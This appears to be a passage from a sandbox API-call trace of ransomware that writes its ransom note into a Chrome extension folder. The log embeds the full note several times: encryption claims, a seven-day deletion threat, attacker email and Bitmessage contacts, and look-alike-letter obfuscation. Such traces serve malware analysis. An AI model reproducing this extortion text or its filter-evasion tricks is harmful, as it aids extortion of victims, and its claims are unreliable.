\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.528] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.529] CloseHandle (hObject=0x2c8) returned 1 [0272.529] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0272.529] GetLastError () returned 0x2 [0272.529] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 